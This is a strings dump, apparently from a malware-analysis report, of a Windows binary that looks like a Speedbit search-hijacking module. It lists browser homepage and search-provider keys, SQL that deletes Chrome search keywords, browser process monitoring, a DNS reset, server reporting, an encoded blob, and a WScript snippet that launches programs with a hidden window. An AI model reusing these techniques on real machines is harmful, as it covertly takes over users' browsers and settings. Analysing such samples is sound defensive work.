.rsrc

@.reloc

FTPj

E@PSSh

 1 23 456

Jx.SHx

.TxK%Yx

208.69.150.250

208.69.150.252

8.8.8.8

SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\

Catcher.ProcessId:

Catcher.Path:

Watcher.Filter:

2.1.9.476

smu.exe

Chrome

Report.xml

/Url:

unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll

3.7.2

SQLite format 3

CREATE TABLE sqlite_master(

sql text

CREATE TEMP TABLE sqlite_temp_master(

REINDEXEDESCAPEACHECKEYBEFOREIGNOREGEXPLAINSTEADDATABASELECTABLEFTHENDEFERRABLELSEXCEPTRANSACTIONATURALTERAISEXCLUSIVEXISTSAVEPOINTERSECTRIGGEREFERENCESCONSTRAINTOFFSETEMPORARYUNIQUERYATTACHAVINGROUPDATEBEGINNERELEASEBETWEENOTNULLIKECASCADELETECASECOLLATECREATECURRENT_DATEDETACHIMMEDIATEJOINSERTMATCHPLANALYZEPRAGMABORTVALUESVIRTUALIMITWHENWHERENAMEAFTEREPLACEANDEFAULTAUTOINCREMENTCASTCOLUMNCOMMITCONFLICTCROSSCURRENT_TIMESTAMPRIMARYDEFERREDISTINCTDROPFAILFROMFULLGLOBYIFISNULLORDERESTRICTOUTERIGHTROLLBACKROWUNIONUSINGVACUUMVIEWINITIALLYo

inflate 1.2.3 Copyright 1995-2005 Mark Adler

deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly

1.2.3

?456789:;<=

!"#$%&'()* ,-./0123

Report factory:

Update.xml

URLSet

Report

homeURL

suggestURL

newTabURL

ieSearchURL

chSearchURL

ffSearchURL

opSearchURL

chromeKeyword

[UpdateParser::Implementation::UpdateParser::ParseUrlSetSection]

vup.tmp

Argument.CheckResult:

Argument.IsRunning:

Delivery of report succeeded. TaskId:

Delivery of report failed.

&#xX;

</%s>

%s="%s"

%s='%s'

<!--%s-->

<![CDATA[%s]]>

version="%s"

encoding="%s"

standalone="%s"

SHDeleteKeyW

RegDeleteKeyExA

RegDeleteKeyExW

NtQueryKey

1.3.6.1.4.1.311.2.1.12

Snapshot.xml

GoogleChrome

MozillaFirefox

AboutTabsUrl

HomePageUrl

DefaultProviderKeyword

UrlsToRestoreOnStartup

StartupHomepageUrl

Chrome propagate flags:

Firefox propagate flags:

ParentKey:

GvrV5 fIBwR5G1CQDyLsic/pOLfRYKAGRyMxV8NxzSLudH5dYJ7ItKYE7rC1AC99X2kzxEChSNvkXetV0jCmjqUjmvO10UOWty3ApOQucR/hia9cu3H02a 5R CG5qhR8Y/uzTzzCr4GfPZ8D8t88yUqyCjdTSd8VRzWUuml0XIRmAC3mIaIBnS0qtpU54eeMa P511PX57TteCBWpQr UysHS8QouOBFyhBBaanipF1PUZ8zItL9IeCtaFExJDKcxi7FU7dmU7ctk7EMZZR3AC3j7jgcRnxrBRdeCW5PDYDKjcHmxPGAZm ePsRg6dCH9XvAsXiSqWsGTuCaJydkQ6BC6sdjbBYCQUNu0nP10JlSn5NzpucbmEgVB1WLSsSDe9vYbtKTOOJRR/CGu7qSqmZ1YxAdjnPMshzg FPfycjHdyERU/SZHvERWXU9WjRnocOXQbT0XOzcBQYfdCa3hiBDgamllsamooTTof6lK6Zb2EYpLiqRQU8WOQCSQu3D2YDP5v9J1Ah7R5gFH4pWrujpklOckba/Bhit29bHcRVAi6mCX5DamNCUq4tY5YMLWVOyVlPLgnZ2 AoHHhCVzsJqNqYZAEseYuauz5gxxhiozc82QCxEJsH2wDGV4Fnf8fmimJyQybsVBebTkkGhRnXfu0YEB4r2oBX3lttd09zG gE2dSUZsHBBBRwvxpM1HoEdvDeLKIaszMpTdRi5i9Rjlxfi9Gpe0mMgvRgepguez9/DfrgUpCVpjnmdNa5TuEirTy3 3mUWdojeY6y8tNBJLsyaj2cmjca3wiE/pLENTnow dbju2fmW9Odso8GLznFwJ6v7o aa2XPOVqX1qryZzbVRaYkdUtOZwrz3FBq1reAfrk12qBENZPPGH8qFcC1Xta09MnkMdxGwD1VeVH6y1RoVkpTPp8mumzKWoXv9DMFPLowiUNgpG22Ss2Vl3szBKCiwYupVQT1GMO/8/psE5WgwQjj9GkHyf3qsI7DSk3d1tp6LFKIdpFPw1fKx72Xwkee0n1T14ksSGewLuCI5WBuOqSexXFXKxmwFhXlCqivfRWSmIJP3ILQrfZbdILbXlwYfOJaoFIMMzCvlMq1hNa/26crmnuBXd8PAHYi5oF Ezzi28v/GmzOTan5Inj1p29ta/WyOajmdLkVPj/Ff/85EnaiNPV62/inI0Y G cikLBu94xgMNywTIn0iSo0A2A5zcNR0/W3DEqGCgbVHqqqN7oxy08Qx5h2gnrOB oSz4TfhJ72enIju7sYLTxMA7kHQzi1uY89QwqJ0lVbA0qUWOVGk3mHyuDH6s6ZsaVE21RT7iGvRc QmQG7X0EwDW3iK5YkiyDUwVzhYEGWfcbv2oR3qOQQDzTqwWYUeFmo0zKzQ86B08jN52EcuOE/ZCkLYCStfmrxhGiipXWbEWtFa973DaRy3KrobC50pz6S4AQ Xu9RlrutYMXGmRg/8hI08I4xW5uWRoMqVCLBcPq478k/Ez1Iuvw3JZBa5n3BHwmUosLcnRRpHWRptiZlKMNviUquLgwrIMhacWmDWX6DGjZz72knZzg3qzYwKatnnRjfEtXRrxXq5dKWE8P/XvlVCstT/qYqNm964Oc46C0p/j6M59qVRvkUnAZuZKVVXVc04fSy4FjvJzrD5LfXxpYA7lBFQ60fZYVir 54eC83A5L9BfivvGlwewWfWS5racrcSmF5nYMxn3f8EjwkuZK91BRZlAPdRAg1gfb2ohlntdntu/8x6g1Fph870zNk13u7LFWihV1csZZqZaKcf8uHi wLKouWpmT1vhCNR07YaH6glQvRnt556rVJvZWmKsVI D11NhFxQLUCKde TCvcZ9s8s2wVPTRW5ahtdYOUnZTFvHHm6WxjtFCc nNYa9LXYdoHnqQQbbKdnkYE3sY0r1cUZAZcLNGx7JjJlAz wLhxfvJ5Se6MsCoFx4tMQppa5N4IrcPL90Nqa0IehVmEvHvCsO96nwiOiJpFF5Rng8RAqrvnP7fJBgG grlD9sfim7R2LOvb8LIeDb/HkDwIOy0Ypq2WpWoj2sTSzv4LQeLmJnKqL8dPxNApEeCe/on90DLRH/7K2BOfAj4xNnkG8Wurgv8Aq205ha0rLU9c3fMu9qrSi/Lbh E5HwYMA/tzBwF6ZXR99yS0gt mz6yNCN8w9wK3 0cO6uoanOjzCCxkuXpkyIU5hIi4/aW0TS2NlDFlvgPs37FyXA3rM0rHHeEds6 N2YImzYWB45i3GqILHKLBnTYfsLAUMKSLqWFcSqlD2EAOJbgUN2dhhIZd8JSqHyltvUyR8fGRbT8H1C6lFlFw6TCxTjkY7hSGOB6CqzEs33tkr55PJUiBsU lrpTQX7T29psodMnih9sC97Wb6zIFJyIfIoxaxbcC411rqyJV WlRazWlP9dmcgd2KEqEuh HIGycoc6a74vp4I1eVo4j1DXtAbXnHEj/Nzk4NsFusbI9x9r8yoJGsAjKACoQqPoqgY6Nh6OgOPbqO0KcFE6RykrPzFDk087OfMz9xiaFrZcW9VdEoOGStbeIbQ61UbyXpHDkUpxIwy4WM6Q9jKdPcTJ3aBz3FCcdefxnGRHHeQ/TqrwU4zZ7WYikjCOoz6MLXTYdCCnrllA//dUk4rwM1HWaGHEMhUdSy8hKAd5bLH9JrVLB06axRgBYkgEfMAtdk/nTZwNFANA3xxxsjmlKtAzYNMpGhR5Jt2gs wEJKr3LF4mYqDxTmRdmxZzTSVlyupVv4c9WZc 5yFM63XebcscL6A4Vnd3tBpJCwY7BQj/INn 6L4DYFeEPAk3u56A6Idj9m5n3G8ElGy2ioOO5NLlT2BbQaf ydP 9doEgUl5I8vsvV3drtRmh8NlZTBnor4rhMg/5817TDiQOHVX/6ICKz8QAQ1qXh7rzHRgxv7l4hHdXC4BGHwimaD0vYdupfNiXOzJcR9Zi2FrL85kXZm/pKyAcUuT4mzwjvKHO8APVYBS3WPir7VT2GFuHIUk1jJdNzKYgPjW22pzqdWXzPCSwjqDtq1qci7tqa/iOikTtCsTOpe AtNDxBDyzbGRaGFRyDRmXf33o2wcd//5IkfU7zQDa8WdYYUqsJynEUW42wWLV2nfjyqvreKblZDfYXn7THCHpV FJqIA6QA3pVD/Iu4KCRWdwZhmGMf5115QF0A6wrHoiZr/C/c/ZzCzFd9AGd0/X/RXx5kAb/zSif FfHcxHpQ1pq956dBZ1KjZrY9PyxZF/uA8rHRCmaSGD4KhAwxA/T36fiLBJIvl YXdITmqH9g nng7f45Zi7UUvzZxHqetki8rZ VsWB0xM9f7cSEmyvDEqfhNKYT P/d8P9NRwv9pUx8RxruqBWYeyfeSKjB j97YTQCVG7lhvWt9SPacgGMHYQuR8YiGg3n/fKOacQ7XY7aXdMHYubFWgoTODW1TvMnTvo9KyKdcPRIZQLlODCSK2cA1/R AIojRwIFEU3gXLsC9CzL9TEeGdDnmnpTjRR/oc4fnDwiFdwh1sts7dbUU/MKxC0vIxSqTJ Bm5RJuCOUcCIOEALJ suBTJvj4EmrcgctR6ryJKkGlDzGLrLWgyK0pY776i MXQ6AA3wbM3ZQi75onR2vwCjgg8UQv5DMcP6HUM17MXCEHdbIEUvhJAKDZ6LGKfkP96HQrEgqjjsj97SZh YcQTzaR0M7JY3K3RwE/Oqv8BkWJMrOL1Mnhg vKtsNcwhtpUsBwrBgu3JrXbI/x0dho12ZuysjpUNiI7l8TVGCz00XXU0TNrucXvRe0z35rEpiTe9S/xdMqSDXmdGPz0VAHnfSf7GAckWfA3cfc6 fK3empP1a92e LLSpLJ eMrocYgVIvvo3sTpDaXWjQTa02srQEfZ9IFEOoEy3hYk1SzsXYanCd2UpHfsIHUn7A6Q5RL6kWAZXZjwXvcyDAd/iE/QmFFsENOkaEHNg5OVQeNkq6yEZdfdzPkkTSoD4ztUHEJpeNg66Z9bb085oS J3S42RvycdQGnk5Oi5IEzP24pIdF j3sKq17UXVbyMFHV8lOjWSlh1Y0Kq937bvGCBsnRwVwsXGaLrE0r4tLCj m5AR2mFP4JZKENROWGtv3BprlrMyW6uvd5XSKuyvDiHUpXC6X9vrBPdjhmY u1Ix3RLWWPyTlPNW9REKmk L6jtTqOdXQBBY6llXsDP GxJn/t1uTRSFktjf19T8K50owKGTnlhpUoqBt9WVKYR6YyGit8Mk9OX/kVR75EdE/t/VVSU/iQ4d3nFk75apgn3VoMIbDYB0MU7nPdwWV4Bw3vs2RpHTpOtd1ALNwE2rqG4GkKoTSlO7r7pf/7JUPLCEJ3MTmW ertKdGAF44MJoB5oJUC7cRpKE1GGYau4eKBe29fIMqabrVr6QSkkptljw8q6a9b0s51CNzKlcCEcnJ7cb8LzsVCoGFhsnLlYPtWEiZHnck3lMYWn 3dXBSbWlR5w4LH5uACO4/rhbVUD4ucX8Q3I xuwLg6D9pwjadqdcdeihP/dYMvbQkdRk/tNAX0NaFWMR/HAAIfPoqp/1rr1gRVssVKEiGD5sEAwe6oTJDXp53arWV3D/D5vn5IujBQ 2rnEYYUHXiy8l1JERR4rjNA7DT12jpOMT0jMd3iVIUBUj1mzjGZXIzrf1f/a31pbSCu 0xzo QvEihKjVfvV3OARI6o/U01YFNMB9PVBsYErGfiDd63JVmt3N8qLiFu9vjgbuR8v1Rqn6xhFt/268gxSnx6tR6RFkFakyk6xOIaoJqswSm7afKhThe55zMkJ1PXHaus/uKqhRKSx4PeLqR FvkdLVc1JiARy7RTdtBf4Bb2EFW11 XM3gU54DShNFXlldANcdZN6m/SO8vvJk2D45MvLWXyNVpppvdKfZ8gxSFna86neYQQ5MDbA2ybUl7PMmpMhipbx4u11sXUrkPb1krAEmlZe8b0NidLcTj9VOBgLD1OGyOnG 6iwNfShAh8UxAiZdQsOW7WkEAhvQWcu8F7zEZv1/RgOnyZj8h3NoufhlpqLWpBDf1Yn2TzN3mCKZZVtLWxoUGYN5hKFOHNw wFzSF/NcvveWIPceTitVXSx5V6KEMOmO9a8dbLLGj7wxi CD8aPNkL axxoWufJlAgNxC5vXoEVAtplK0CHRgJ/wFPHmREGEF7NKP9A1ATHTHzs97I04evT1dSc49oXK9XKbkx4nNsdwgeSdyWVKCABqAz9kVRVIom17pjwW8hc2JMJMhfEYUhDTenPgRu39cVRdPbHRBv9RULbqFimTLA6Ty1z2vN d RyOelC1Br/KCR1gs3 82Cpw9ANMYOUJSuSRxU/0yUKmboVum8icoM 1NpWi o wNKF/mtSGBg2O7QHI1qiCaEFr4JJ1dCTCibfvDUMgTIY4O6BS09dnfU66wIflATHfn3Vmz2O50icTeJCWKS1jbawYcRi18oLSBwmpPDXEo2PN7yZL9HUZF1QouUtVmHVEdUE4rQByTqa1MVsX86qDqtUnory9jONYV/vH7d4ez2KHSdPTt9xp3DAUH6A6dfyDIuV/9p42DDcXnW76lM3U/CsGM D9wFWiE46fRg5YU7GaujJWF04ZND7q gtbYPtbQ5 c5GicyYhXm7 JEE0t2 umb1A3XkLpWHPgOskn6nDRqT8pogSUQIwAhh71cUWkOGDMbcf JXOSMxXP9kIlF0Hl83ZsuwOnCxDcq7fa7o4mw/XZQgWJ7s4hA8s3/oev6/GtZX1KRw0qxgWbFSByNpU9rJc7akt9ZTVy19DUC2bVf/S7 mDmdLTLXknZuoeYWL /Yu/KMHimnmPc3VbRijG9yMq346J4Uzg qdOxn2P9sq2/IGUhNgRHnYhWUtJpyCaS7J8aQXHlRip23vRRFZdpWvqMNS9BWHDk1ISh5GUkediSGfX6oTEL2qol6OQQa4sXuy2Ei75O6Mdxd8rEdObV9Nr8FAW0IXJI93aPpDKjCx12PbNKFWnWXhtfxNKNQd9uTCY=

2, 1, 9, 476

Envelop.xml

Configuration.xml

UrlSet

Opera

StartPageUrl

AboutTabUrl

SearchScopeUrl

SearchScopeIconUrl

SearchScopeSuggestUrl

DefaultProviderSearchUrl

DefaultProviderIconUrl

DefaultProviderSuggestUrl

SearchPluginUrl

SearchPluginSuggestionUrl

TabPageUrl

SearchEngineFaviconUrl

SearchEngineSuggestionUrl

SearchEngineSearchUrl

SearchEngineKeyword

System.xml

Reset-2.1.0.7

UpdateUrl

ReportUrl

ReportDlls

User.xml

urls

SELECT * FROM urls

ERROR: %s

WebData path:

Argument.GeneralConfig:

Argument.Snapshot:

Argument.Flags:

suggest_url

originating_url

favicon_url

keyword

keyword LIKE '

keywords

WHERE key = 'Default Search Provider ID'

key = 'Default Search Provider ID'

DELETE from keywords WHERE id =

search_url

icon_url

startup_urls

urls_to_restore_on_startup

chrome_url_overrides

template_url_data

www-searching.com

image_url_post_params

instant_url

instant_url_post_params

new_tab_url

search_terms_replacement_key

search_url_post_params

suggestions_url

suggestions_url_post_params

chrome_settings_overrides

session.startup_urls

web_url

search_icon.png

select count(*) from sqlite_master where type = 'table' and name = '

%d-%m-%Y %H:%M, %a

large file support is disabled

SQL logic error or missing database

foreign_keys

sqlite_compileoption_get

sqlite_compileoption_used

sqlite_source_id

sqlite_version

sqlite_attach

sqlite_detach

sqlite_stat1

sqlite_rename_parent

sqlite_rename_trigger

sqlite_rename_table

RowKey

SQLITE_

d-d-d d:d:d

d:d:d

d-d-d

failed to allocate %u bytes of memory

failed memory resize %u to %u bytes

922337203685477580

API call with %s database connection pointer

%s-shm

%s\etilqs_

OsError 0x%x (%u)

Recovered %d frames from WAL file %s

invalid page number %d

2nd reference to page %d

Failed to read ptrmap key=%d

Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)

%d of %d pages missing from overflow list starting at %d

failed to get page %d

freelist leaf count too big on page %d

Page %d:

unable to get the page. error code=%d

btreeInitPage() returns error code %d

On tree page %d cell %d:

On page %d at right child:

Corruption detected in cell %d on page %d

Multiple uses for byte %d of page %d

Fragmentation of %d bytes reported as %d on page %d

Page %d is never used

Pointer map page %d is referenced

Outstanding page count goes from %d to %d during this analysis

keyinfo(%d

%s(%d)

%s-mjX

foreign key constraint failed

unable to use function %s in the requested context

bind on a busy prepared statement: [%s]

zeroblob(%d)

abort at %d in [%s]: %s

constraint failed at %d in [%s]

cannot open savepoint - SQL statements in progress

no such savepoint: %s

cannot %s savepoint - SQL statements in progress

cannot rollback transaction - SQL statements in progress

cannot commit transaction - SQL statements in progress

sqlite_temp_master

sqlite_master

SELECT name, rootpage, sql FROM '%q'.%s WHERE %s ORDER BY rowid

cannot change %s wal mode from within a transaction

database table is locked: %s

statement aborts at %d: [%s] %s

cannot open virtual table: %s

cannot open view: %s

no such column: "%s"

foreign key

indexed

cannot open %s column for writing

cannot open value of type %s

misuse of aliased aggregate %s

%s: %s.%s.%s

%s: %s.%s

%s: %s

not authorized to use function: %s

%r %s BY term out of range - should be between 1 and %d

too many terms in %s BY clause

Expression tree is too large (maximum depth %d)

variable number must be between ?1 and ?%d

too many SQL variables

too many columns in %s

misuse of aggregate: %s()

%.*s"%w"%s

%s%.*s"%w"

%s OR name=%Q

there is already another table or index with this name: %s

sqlite_

table %s may not be altered

view %s may not be altered

UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;

UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d 18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');

sqlite_sequence

UPDATE "%w".sqlite_sequence set name = %Q WHERE name = %Q

UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;

Cannot add a PRIMARY KEY column

UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q

sqlite_altertab_%s

CREATE TABLE %Q.%s(%s)

DELETE FROM %Q.%s WHERE tbl=%Q

SELECT idx, stat FROM %Q.sqlite_stat1

invalid name: "%s"

too many attached databases - max %d

database %s is already in use

unable to open database: %s

no such database: %s

cannot detach database %s

database %s is locked

%s %T cannot reference objects in database %s

access to %s.%s.%s is prohibited

access to %s.%s is prohibited

object name reserved for internal use: %s

there is already an index named %s

too many columns on %s

duplicate column name: %s

default value of column [%s] is not constant

table "%s" has more than one primary key

AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY

no such collation sequence: %s

CREATE %s %.*s

UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d

CREATE TABLE %Q.sqlite_sequence(name,seq)

view %s is circularly defined

UPDATE %Q.%s SET rootpage=%d WHERE #%d AND rootpage=#%d

table %s may not be dropped

use DROP TABLE to delete table %s

use DROP VIEW to delete view %s

DELETE FROM %s.sqlite_sequence WHERE name=%Q

DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'

DELETE FROM %Q.sqlite_stat1 WHERE tbl=%Q

foreign key on %s should reference only one column of table %T

number of columns in foreign key does not match the number of columns in the referenced table

unknown column "%s" in foreign key definition

indexed columns are not unique

table %s may not be indexed

views may not be indexed

virtual tables may not be indexed

there is already a table named %s

index %s already exists

sqlite_autoindex_%s_%d

table %s has no column named %s

CREATE%s INDEX %.*s

INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);

no such index: %S

index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped

DELETE FROM %Q.%s WHERE name=%Q

DELETE FROM %Q.sqlite_stat1 WHERE idx=%Q

a JOIN clause is required before %s

unable to identify the object to be reindexed

table %s may not be modified

cannot modify %s because it is a view

foreign key mismatch

table %S has %d columns but %d values were supplied

%d values for %d columns

table %S has no column named %s

%s.%s may not be NULL

PRIMARY KEY must be unique

sqlite3_extension_init

unable to open shared library [%s]

no entry point [%s] in shared library [%s]

error during initialization: %s

automatic extension loading failed: %s

foreign_key_list

*** in database %s ***

unsupported encoding: %s

malformed database schema (%s)

%s - %s

unsupported file format

SELECT name, rootpage, sql FROM '%q'.%s ORDER BY rowid

database schema is locked: %s

unknown or unsupported join type: %T %T%s%T

RIGHT and FULL OUTER JOINs are not currently supported

a NATURAL join may not have an ON or USING clause

cannot have both ON and USING clauses in the same join

cannot join using column %s - column not present in both tables

%s.%s

%s:%d

ORDER BY clause should come after %s not before

LIMIT clause should come after %s not before

SELECTs to the left and right of %s do not have the same number of result columns

no such index: %s

sqlite_subquery_%p_

no such table: %s

sqlite3_get_table() called with two or more incompatible queries

cannot create %s trigger on view: %S

cannot create INSTEAD OF trigger on table: %S

INSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')

no such trigger: %S

-- TRIGGER %s

no such column: %s

PRAGMA vacuum_db.synchronous=OFF

SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND rootpage>0

SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'

SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'

SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0

SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';

INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)

UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d

vtable constructor failed: %s

vtable constructor did not declare schema: %s

no such module: %s

table %s: xBestIndex returned an invalid plan

at most %d tables in a join

cannot use index: %s

TABLE %s

%s AS %s

%s WITH AUTOMATIC INDEX

%s WITH INDEX %s

%s VIA MULTI-INDEX UNION

%s USING PRIMARY KEY

%s VIRTUAL TABLE INDEX %d:%s

%s ORDER BY

the INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggers

the NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggers

unable to close due to unfinished backup operation

unknown database: %s

no such vfs: %s

database corruption at line %d of [%.10s]

misuse at line %d of [%.10s]

cannot open file at line %d of [%.10s]

Argument.StartPage:

Argument.Autosearch:

Argument.NewTabPageShow:

Argument.SearchScopeId:

Argument.Tabs:

C:\BUILDS\Build_Watchman\Ver2\Speedbit.Watchman\Bin\SearchModulePlus_SearchModulePlus\Win32\WinMV\Release\smu.pdb

SHELL32.dll

SHLWAPI.dll

KERNEL32.dll

USER32.dll

RegOpenKeyExA

RegCloseKey

RegOpenKeyExW

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

MSVCP90.dll

MSVCR90.dll

_amsg_exit

_crt_debugger_hook

WinHttpReceiveResponse

WinHttpSendRequest

WinHttpConnect

WinHttpCloseHandle

WinHttpQueryDataAvailable

WinHttpOpen

WinHttpOpenRequest

WinHttpReadData

WinHttpGetIEProxyConfigForCurrentUser

WINHTTP.dll

GetExtendedTcpTable

IPHLPAPI.DLL

WS2_32.dll

PSAPI.DLL

WTSAPI32.dll

Secur32.dll

CryptMsgClose

CertGetNameStringW

CertFreeCertificateContext

CertFindCertificateInStore

CertCloseStore

CryptMsgGetParam

CRYPT32.dll

USERENV.dll

CreatePipe

ConnectNamedPipe

CreateNamedPipeW

GetNamedPipeInfo

DisconnectNamedPipe

GetProcessHeap

RegCreateKeyW

RegCreateKeyExW

RegOpenKeyW

RegQueryInfoKeyW

RegDeleteKeyA

RegDeleteKeyW

RegEnumKeyExA

RegCreateKeyA

RegCreateKeyExA

RegQueryInfoKeyA

RegOpenKeyA

RegEnumKeyExW

RegEnumKeyW

.?AVImplementation@ReportBuilder@Monitor@SpeedBit@@

.?AVReportBuilder@Monitor@SpeedBit@@

.?AVHistoryReportFactory@Implementation@ServerReporter@Monitor@SpeedBit@@

.?AVReportFactory@Implementation@ServerReporter@Monitor@SpeedBit@@

.?AVImplementation@ServerReporter@Monitor@SpeedBit@@

.?AVServerReporter@Monitor@SpeedBit@@

.?AVEventHandler@SendReportTask@Implementation@WatchmanMonitor@Monitor@SpeedBit@@

.?AVSendReportTask@Implementation@WatchmanMonitor@Monitor@SpeedBit@@

.?AVProfile@Implementation@InstallInfo@Firefox@SpeedBit@@

.?AVInstallInfo@Implementation@0Firefox@SpeedBit@@

.?AVProfile@InstallInfo@Firefox@SpeedBit@@

.?AVInstallInfo@Firefox@SpeedBit@@

.?AVImplementation@PipedProcess@Utils@SpeedBit@@

.?AVPipedProcess@Utils@SpeedBit@@

.?AVImplementation@MachineKey@Utils@SpeedBit@@

.?AVMachineKey@Utils@SpeedBit@@

.?AVFirefoxSettings@Implementation@Snapshot@Injection@SpeedBit@@

.?AVChromeSettings@Implementation@Snapshot@Injection@SpeedBit@@

.?AVSettings@Firefox@Snapshot@Injection@SpeedBit@@

.?AVSettings@Chrome@Snapshot@Injection@SpeedBit@@

.?AVUrlSet@Implementation@General@Config@SpeedBit@@

.?AVFirefoxValueSet@Implementation@General@Config@SpeedBit@@

.?AVChromeValueSet@Implementation@General@Config@SpeedBit@@

.?AVOperaSettings@Implementation@General@Config@SpeedBit@@

.?AVFirefoxSettings@Implementation@General@Config@SpeedBit@@

.?AVChromeSettings@Implementation@General@Config@SpeedBit@@

.?AVSettings@Opera@General@Config@SpeedBit@@

.?AVValueSet@Firefox@General@Config@SpeedBit@@

.?AVSettings@Firefox@General@Config@SpeedBit@@

.?AVValueSet@Chrome@General@Config@SpeedBit@@

.?AVSettings@Chrome@General@Config@SpeedBit@@

.?AVUrlSet@General@Config@SpeedBit@@

.?AVFirefoxSettings@Implementation@User@Config@SpeedBit@@

.?AVChromeSettings@Implementation@User@Config@SpeedBit@@

.?AVSettings@Firefox@User@Config@SpeedBit@@

.?AVSettings@Chrome@User@Config@SpeedBit@@

.?AVChromeBrowserHistory@SQLite@SpeedBit@@

.?AVException@sql@@

.?AVImplementation@Factory@BrowserInfo@Chrome@SpeedBit@@

.?AVFactory@BrowserInfo@Chrome@SpeedBit@@

.?AVImplementation@BrowserInfo@Chrome@SpeedBit@@

.?AVBrowserInfo@Chrome@SpeedBit@@

.?AVLoader@Extension@Chrome@SpeedBit@@

.?AVImplementation@Extension@Chrome@SpeedBit@@

.?AVExtension@Chrome@SpeedBit@@

.?AVBrowserSettings@Implementation@0Chrome@SpeedBit@@

.?AVBrowserSettings@Chrome@SpeedBit@@

.?AVImplementation@WebDataDB@SQLite@SpeedBit@@

.?AVWebDataDB@SQLite@SpeedBit@@

.?AVBrowserSettings@Implementation@0Firefox@SpeedBit@@

.?AVBrowserSettings@Firefox@SpeedBit@@

<requestedExecutionLevel level="highestAvailable" uiAccess="false"></requestedExecutionLevel>

<assemblyIdentity type="win32" name="Microsoft.VC90.CRT" version="9.0.21022.8" processorArchitecture="x86" publicKeyToken="1fc8b3b9a1e18e3b"></assemblyIdentity>

</assembly>PADif (WScript.Arguments.length > 0)

var root = WScript.Arguments(0);

for (var i = 1, n = WScript.Arguments.length; i < n;   i)

args.push(WScript.Arguments(i));

var path = "\""   root.replace(/\\*$/, "").replace(/\//g, "\\")   "\"";

path  = " \""   args.join("\" \"")   "\"";

var shell = WScript.CreateObject("WScript.Shell");

shell.Run(path, 0, false);

0%0 01070

2(2-272[2

3#3-323<3`3

8„8C8[8

5)686=6{6

2%2U2h2

4%4u4|4

0(0;0`0}0

5&515?5[5

6'626@6\6{6

!00050=0

2,2U2f2x2

4)545?5|5

<'<0<;<`<

11\1{1

;7;<;[;`;

0!030`0}0

50656=6|6

7$7-787]7

6!6)6:6~6

2$3(3,3034383<3@3

7"7(7,7:7

1"2-2H2Q2}2

5(5!9&939

9!9(9/959

4W5D5

6q7:7]7

0
0=0`0

<&<2<;<^<

4L4j4

: :$:0:4:8:

2 2$2(2,2024282<2|4

8$8(8,8084888

= =$=(=,=0=4=8=<=

? ?$?(?,?0?4?8?

> >$>(>,>0>4>8><>

Injection::Snapshot::Controller::IsChromeInstalled

Chrome installed:

Injection::Snapshot::Controller::IsFirefoxInstalled

Firefox installed:

Chrome unchanged:

Firefox unchanged:

Checking<Parameter.Input>

Checking<Parameter.Key>

logs\${ModuleName}.${Pid}.log

WatchmanKey::TimeBomb::UninstallTimeBomb

Reporting

ChromeExtensionMonitorWorkerThread started

ChromeExtensionMonitor::CollectExtensionInfo

ChromeExtensionMonitor::CheckExtension

8Reset DNS to 8.8.8.8 for adapter

WinHTTP Example/1.0

VVV.google.com

SOFTWARE\Google\Chrome

SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows

Registry::Helper::RegOpenKeyExA

Chrome::StartPageProtectionEnabled

Chrome::SearchEngineProtectionEnabled

Chrome::RestoreOnStartupProtectionEnabled

Chrome::StartPageProtectionDisabled

Chrome::SearchEngineProtectionDisabled

Chrome::RestoreOnStartupProtectionDisabled

Firefox::StartPageChangedByUser

Firefox::SearchEngineChangedByUser

Explorer.HomePageEvent:

Explorer.SearchEngineEvent:

Firefox.HomePageEvent:

Firefox.SearchEngineEvent:

ProcessCatcher::ExecutionContext::Resume

Allocation<ExecutionContext>

iexplore.exe

rundll32.exe

chrome.exe

firefox.exe

opera.exe

safari.exe

navigator.exe

torch.exe

U.exe

epic.exe

browser.exe

Maxthon.exe

sbframe.exe

avant.exe

dragon.exe

bobrowser.exe

ProcessMonitor::ExecutionContext::Resume

E:\iexplore.exe|E:\rundll32.exe

